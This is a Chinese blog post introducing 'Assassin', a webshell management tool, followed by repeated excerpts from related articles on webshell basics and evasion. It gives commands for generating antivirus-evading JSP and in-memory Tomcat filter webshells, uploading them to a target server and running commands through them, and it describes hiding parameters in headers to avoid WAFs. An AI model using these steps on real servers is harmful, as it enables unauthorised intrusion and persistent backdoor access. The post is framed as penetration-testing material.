一款精简的webshell管理工具 -- Assassin

一颗小胡椒2023-01-03 11:41:11

一、工具介绍

Assassin是一款精简的基于命令行的webshell管理工具,它有着多种payload发送方式和编码方式,以及精简的payload代码,使得它成为隐蔽的暗杀者,难以被很好的防御。工具短小精悍,生成的webshell能够过常见杀软,尽量减少了连接后交互的流量特征,具体payload发送方式均可自定义。由于个人精力有限(因为懒而且菜),服务端暂时仅支持Java。

二、安装与使用

1、用startup.bat或startup.sh启动,之后会弹出窗口选择保存位置

new java 123 cookie
# 生成密码为123 发送方式为cookie的普通jsp木马
new java pass post reqEncode=base36 tamper=tomcat9_filter
# 生成密码为pass 发送方式为post 请求用base36编码的tomcat9 filter内存马

2、将webshell上到目标服务器

add http://192.168.48.130:8080/1.jsp 123 java method=cookie resEncode=base36
# 添加webshell 密码123 java马 cookie传参 请求编码默认base64 响应编码base36

3、show查看ID号 

4、session 1连接webshell

5、看到提示符发生变化就可以执行webshell controller commands的命令了

Assassin|java >getshell
Assassin|java|C:\apache-tomcat-9.0.54\bin >dir

6、上传文件

upload # 没参数默认传到当前目录,选择文件即可上传

7、下载文件

download ./test.txt同理

下载地址:

项目地址:https://github.com/b1ackc4t/Assassin

cookiewebshell
本作品采用《CC 协议》,转载必须注明作者和本文链接
接到一个紧急测试任务,只有一个目标名称和一个ip。这样的话webshell的url就无法正常访问了)带上cookie即可正常连接。连接成功后,为了稳定webshell,我们尝试将webshell写入到根目录和静态文件的目录,但是仍会受到强制跳转的影响。于是将webshell内容写入到了在登陆前就能访问的jsp正常文件中,来稳定shell。
webshell免杀之传参方式及特征绕过传参方式 在这里解释一下为什么,需要讲述传参方式,由于在很多情况下,以请求头作为参数传递并非waf和人工排查的重中之重且非常误导和隐藏
工具短小精悍,生成的webshell能够过常见杀软,尽量减少了连接后交互的流量特征,具体payload发送方式均可自定义。由于个人精力有限,服务端暂时仅支持Java。
Webshell简介webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。它的流量特征十分明显,现如今的安全设备基本上都可以识别到菜刀的流量。现在的菜刀基本都是在安全教学中使用。
WebShell基础详解
2022-01-07 06:47:08
顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。
顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。
目前国内安全人员常用的有:中国菜刀、中国蚁剑、冰蝎、哥斯拉、Metasploit、SharPyShell等,也有一些内部团队开发的类似工具,但是并没有对外公开。已被各大安全厂商提取其特征。任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!这个工具超越于普通的webshell管理是因为其还拥有安全扫描、漏洞利用测试等功能,可以帮助渗透测试人员进行高效的测试工作。
一颗小胡椒
暂无描述